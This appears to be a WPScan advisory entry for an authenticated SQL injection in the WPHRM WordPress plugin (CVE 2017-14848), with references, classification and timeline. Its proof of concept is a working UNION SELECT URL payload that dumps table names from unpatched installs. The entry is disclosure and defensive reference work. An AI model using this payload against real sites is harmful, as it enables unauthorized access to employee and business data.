WPHRM <= 1.0 - Authenticated SQL Injection



Description
The vulnerability allows an employee users to inject SQL commands.
Proof of Concept
http://localhost/[PATH]/?hr-dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]-23+union+select 1,2,3,4,5,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),7,8--%20-

http://localhost/[PATH]/?hr-dashboard=user&page=user&tab=view_employee&action=view&employee_id=[SQL]

Affects Plugin

fixed in version 1.1

References

CVE 2017-14848
EXPLOITDB 42924
URL https://codecanyon.net/item/wphrm-human-resource-management-system-for-wordpress/20555857

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter David Hayes
Submitter Website https://wpshout.com
Submitter Twitter davidbhayes
Views 5908
Verified No
WPVDB ID 8929

Timeline

Publicly Published 2017-09-09 (over 2 years ago)
Added 2017-10-11 (about 2 years ago)
Last Updated 2019-11-01 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin